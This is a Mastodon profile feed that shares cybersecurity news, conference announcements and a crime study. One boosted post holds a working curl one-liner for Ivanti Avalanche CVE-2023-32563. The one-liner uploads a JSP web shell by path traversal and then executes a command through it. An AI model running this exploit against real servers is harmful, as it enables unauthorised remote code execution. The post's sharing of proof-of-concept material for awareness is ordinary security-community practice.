@starbuck3000

31 Followers
40 Following
70 Posts
T'as lu les conditions générales?
#cyber #cybersecurity #privacy
Twitterhttps://www.twitter.com/starbuck3000
starbuck3000Mar 16, 2025
Claus Cramon HoumannMar 10, 2025

So @trailofbits released a new threat modelling framework. I really like that, as all of the old existing 'reference' frameworks are so hard to apply in a way that brings any or much value to the process. Or I'm too dumb to do it :P.

Very exciting: https://blog.trailofbits.com/2025/02/28/threat-modeling-the-trail-of-bits-way/

#threatmodelling

Threat modeling the TRAIL of Bits way

In this blog, we’ll talk about our threat modeling process, TRAIL, which stands for Threat and Risk Analysis Informed Lifecycle. TRAIL enables us to trace and document the impact of flawed trust assumptions and insecure design decisions throughout each client’s system architecture and SDLC. Over time, multiple application security experts have refined TRAIL to provide maximal value for our clients and to minimize the effort required to update the threat model as the system changes.

The Trail of Bits Blog
starbuck3000Oct 4, 2023
- Describe your Twitter experience this month.
- Something went wrong. Try again.
starbuck3000Aug 25, 2023
wvuAug 25, 2023

Ivanti Avalanche CVE-2023-32563:

curl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F "file=@-;filename=x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe

starbuck3000May 16, 2023

"The majority of violent crimes [in Sweden] are perpetrated by a small number of persistent violent offenders, typically males, characterized by early onset of violent criminality, substance abuse, personality disorders, and nonviolent criminality."

https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3969807/

The 1 % of the population accountable for 63 % of all violent crime convictions

Population-based studies on violent crime and background factors may provide an understanding of the relationships between susceptibility factors and crime. We aimed to determine the distribution of violent crime convictions in the Swedish population ...

PubMed Central (PMC)
starbuck3000May 7, 2023

La Belgique légalise le piratage éthique au sens originel de sa définition, et accorde le statut de lanceurs d'alerte aux "pirates" qui révèlent des manquements graves même sans y avoir été invités par le propriétaire du système/service.

Une fois de plus, le "leader mondial de l'innovation", que je ne mentionnerai pas en toutes lettres, se fait passer devant...

https://www.law.kuleuven.be/citip/blog/belgium-legalises-ethical-hacking-a-threat-or-an-opportunity-for-cybersecurity/

starbuck3000May 6, 2023
I just installed the #Mastodon app on my phone (Android). When I click links, they seem to be opened in some sort of Chrome emulation. Did I miss the option to disable internal browsing?
starbuck3000Feb 6, 2023
Insomni'hackFeb 6, 2023

The list of workshops (trainings) for Insomni’hack 2023 is now available and registration is open: https://insomnihack.ch/workshops-2023/

The number of seats is limited so register now, while they are still available! #INSO23 #INS23

Workshops 2023 - Insomni'hack

starbuck3000Jan 24, 2023
INDE - L'analyse forensique de l'ordinateur d'un prêtre jésuite accusé de complicité de terrorisme, et décédé durant son emprisonnement, soutient l'hypothèse de preuves implantées par un tiers (rapport forensique disponible au téléchargement):
https://www.washingtonpost.com/world/2022/12/13/stan-swamy-hacked-bhima-koregaon/
Hackers planted evidence on computer of jailed Indian priest, report says

Father Stan Swamy died after spending more than eight months in jail on terrorism charges.

The Washington Post
starbuck3000Jan 24, 2023
Insomni'hackJan 24, 2023

Insomni’hack 2023’s talks schedule is now live: https://insomnihack.ch/talks-2023/

A few more talks (including both keynotes) will be announced soon. Stay tuned for further updates. #INS23 #INSO23

Talks 2023 - Insomni'hack

starbuck3000Jan 16, 2023

La panne qui a paralysé l'espace aérien américain mercredi dernier serait due à un fichier de base données (NOTAM) corrompu. On notera que la conclusion des "Décideurs" est de procéder à une rénovation du service, repoussée depuis des années.

https://edition.cnn.com/travel/article/faa-ground-stop-causes/index.html

A corrupt file led to the FAA ground stoppage. It was also found in the backup system

An FAA system outage caused massive delays and cancellations across the United States on Wednesday. Here's what happened, according to a source familiar with the Federal Aviation Administration operation.

CNN